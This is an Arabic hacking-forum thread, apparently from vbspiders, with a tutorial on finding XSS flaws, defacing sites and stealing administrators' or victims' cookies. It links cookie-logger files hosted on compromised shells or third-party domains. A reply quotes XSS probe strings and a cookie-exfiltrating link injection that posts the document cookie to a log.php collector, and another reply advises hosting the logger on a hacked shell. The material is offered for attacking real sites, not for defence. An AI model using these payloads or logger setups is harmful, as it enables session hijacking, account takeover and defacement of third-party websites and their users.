|
![]() |
| LinkBack ![]() | أدوات الموضوع ![]() | انواع عرض الموضوع ![]() |
![]() | رقم المشاركة : 1 (permalink) | ||||||||||||||||||||||||||||||||||||||
![]() بسم الله الرحمآن الرحيم ان شاء الله اليوم رح نشرح \ اكتشاف تغرات xss \ تعليق الآندكس من تغرات xss \ سرقة كوكيز من تغرات xss ################ سرقة الكوكيز من تغرات xss اولا لازم نقوم بتنصيب السيرفر الشخصي ع جهازنا ![]() download تانيا لازم يكون عندنا الموقع المصاب او السكربت ![]() انا برمجة ملف عادي جدآآ ! مصاب بهذه التغره ![]() نسميه مثلا ..~ xss.php ![]() ومحتواه علشان تجربوآا معي الاستغلال الكامل لها ..~ كود PHP: ![]() طيب الآن نستعرض الملف المصاب مع المتغير ! ~~~~~~~~~~~~ على فكره شباب ! تم شرح التغره من قبل في المنتدى ..~ يستحسن انكم تراجعوا هذا الرابط ..~ http://www.vbspiders.com/vb/t24758.html & http://www.vbspiders.com/vb/t22376.html ~~~~~~~~~~~~ طيب نتابع ![]() ![]() طبعا كيف نكتشف التغره سهل كثير ..~ يعني تضيف الكود هذا كود PHP: رح ارفق لكم الكود في المرفقات مع كل حاجه ! طيب رح نضغط اوونتر ورح تشوف ان رساله ضهرت لنا في المتصفح ..~ ![]() تعال الآن نستفيد من التغره ! اولا التغره تقدر تسرق بها كوكيز الآدمن او الضحيه بصفه عامه ..~ تقدر تحقن اكواد html او تغره للمتصفح ملغومه بباتش علشان تخترق ..~ شو هاي الحلاوه ..~ ههه انا رح اشرح لكم كيف تسرق الكوكيز ..~ اولا لازمنا ملف لوج علشان يسجل لنا الكوكيز والمعلومات في ملف txt ملفات اللوج تكون خاصه :( وهناك ملفات لووج تجيب لك معلومات كامله ! كوكيز + الوقت + التاريخ + ... وفي نوع آخر عادي ..~ يعطيك الكوكيز فقط ! ههع رح اعطيكم ملف لووج عندي كثير حلو ![]() طيب نشوف السورس كود بتاعوا ..~ كود PHP: انا عندي مرفوع على شل ..~ الموقع يلي رفعنا لو الووج رح يكون زي هيك مثلا ! www.vbspiders.com/log.php ورح يسجل لنا المعلوومات في ملف اسموا nor15din.txt www.vbspiders.com/nor15din.txt ![]() طيب الآن كيف نستغل التغره ..~ يلزمنى كود تلغيم ..~ كود PHP: كود PHP: رح نضيف هذول الاكواد مع تغير مايجب تغيره ![]()
نضط اوونتر ونروح نفتح الملف nor15din.txt
ههههه حلو ..~ ياريت اي واحد ينقل الموضوع ..~ يحافض على الحقوق :( ![]() لتحميل الادواة ~~~~~~~~~~~~~~~~~~ الشي يلي اضفناه وجديد هو اننا شرحنا كل شي تقريبا يتعلق بهذه التغره في فيديوا + صفحه HTML ![]() لتحميل الشرح الكامل على شكل صفحه HTML لتحميل فيديوا التطبيق وفي الاخير هذيه بسيطه وهي ملف لوج مرفوووع وجاهز ![]() http://www.illicitromance.com/log.php وفي هذه الصفحه رح يتم تسجيل الكوكيز + المعلومات ![]() http://www.illicitromance.com/nor15din.txt ع فكره هذه طريقة اخرى لتعليق آندكس مميز من تغرات xss priv8 ~ تعليق الاندكس من ثغرات priv8 ~ xss ~~~~~~~~~~~~ وهنا طريقة اخرى لاستغلال التغره مشروحة من طرف حبيبنا IronMan ![]() جديد استخدامات xss وهي الـ phishing login بالتوفيق .. @nor15din F jl hgj[]d] D Z avp ;hlg lj;hlg gjyvhj xss | hpjvhtd >>Z la;gi l,q,u l,ru g;k hg]dk hgw,v hpjvht hsjtshv []d] vtu avp التعديل الأخير تم بواسطة bleu moon ; 09-10-2011 الساعة 07:01 PM. | |||||||||||||||||||||||||||||||||||||||
| ![]() |
![]() | رقم المشاركة : 3 (permalink) | ||
![]()
التعديل الأخير تم بواسطة k4$p3r-MA ; 08-21-2011 الساعة 03:44 PM. | |||
| ![]() |
![]() | رقم المشاركة : 6 (permalink) | ||
![]() مشكووووووووور اخ نورد الدين على الشرح الوافي ماشاء الله عليك دائما متوفق سلآم
| |||
| ![]() |
![]() | رقم المشاركة : 8 (permalink) | ||
![]() وعليــكم السـلآم و رحمة الله
| |||
| ![]() |
![]() | رقم المشاركة : 12 (permalink) |
![]() يعطيك العافية اخوي عالشرح ...ولكن عندي استفسار: كود: '"--></style></script>***************("Www.VBspiders.com")</script> كود: \'\" كود: '"--></style></script>***************(4444444)</script> ولكن لما اجيت احط هذا الامر: كود: "><a href="#" onclick="********.location='http://localhost/log.php' +escape(********.******);"><Click Me></a></script> تحياتي التعديل الأخير تم بواسطة mass1993 ; 08-21-2011 الساعة 11:35 PM. | |
| ![]() |
![]() | رقم المشاركة : 13 (permalink) |
![]() انت رافع ملف الوج على السيرفرا الشخصي وهذا غلط ! لازم يكون ع شل :( ![]() | |
| ![]() |
![]() | رقم المشاركة : 14 (permalink) | ||
![]() مشكور صديقي !!
| |||
| ![]() |
![]() |
مواقع النشر (المفضلة) |
الكلمات الدليلية (Tags) |
مشكله, موضوع, موقع, لكن, الدين, الصور, احتراف, استفسار, جديد, رفع, شرح, xss |
|
|